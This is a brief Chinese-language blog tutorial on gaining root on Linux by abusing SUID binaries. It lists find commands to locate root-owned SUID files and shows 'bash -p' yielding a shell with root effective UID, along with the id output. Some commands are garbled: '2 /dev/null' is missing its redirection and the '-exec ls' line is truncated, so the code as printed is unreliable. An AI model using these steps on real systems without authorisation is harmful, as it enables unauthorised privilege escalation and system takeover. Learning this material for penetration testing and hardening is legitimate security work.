Linux下如何利用SUID提权

66次阅读
没有评论

共计 654 个字符,预计需要花费 2 分钟才能阅读完成。

今天丸趣 TV 小编给大家分享一下 Linux 下如何利用 SUID 提权的相关知识点,内容详细,逻辑清晰,相信大部分人都还太了解这方面的知识,所以分享这篇文章给大家参考一下,希望大家阅读完这篇文章后有所收获,下面我们一起来了解一下吧。

SUID 是 Linux 的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥有 SUID 权限,那么就可以利用系统中的二进制文件和工具来进行 root 提权。

以下命令可以发现系统上运行的所有 SUID 可执行文件。具体来说,命令将尝试查找具有 root 权限的 SUID 的文件。

find / -user root -perm -4000 -print 2 /dev/null
find / -perm -u=s -type f 2 /dev/null
find / -user root -perm -4000 -exec ls

 

  以上所有二进制文件都将以 root 用户权限执行,因为它们的权限中包含 s,并且对应的是 root 权限。

Bash

以下命令将以 root 权限打开一个 bash shell。

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

以上就是“Linux 下如何利用 SUID 提权”这篇文章的所有内容,感谢各位的阅读!相信大家阅读完这篇文章都有很大的收获,丸趣 TV 小编每天都会为大家更新不同的知识,如果还想学习更多的知识,请关注丸趣 TV 行业资讯频道。

正文完
 
丸趣
版权声明:本站原创文章,由 丸趣 2023-07-15发表,共计654字。
转载说明:除特殊说明外本站除技术相关以外文章皆由网络搜集发布,转载请注明出处。
评论(没有评论)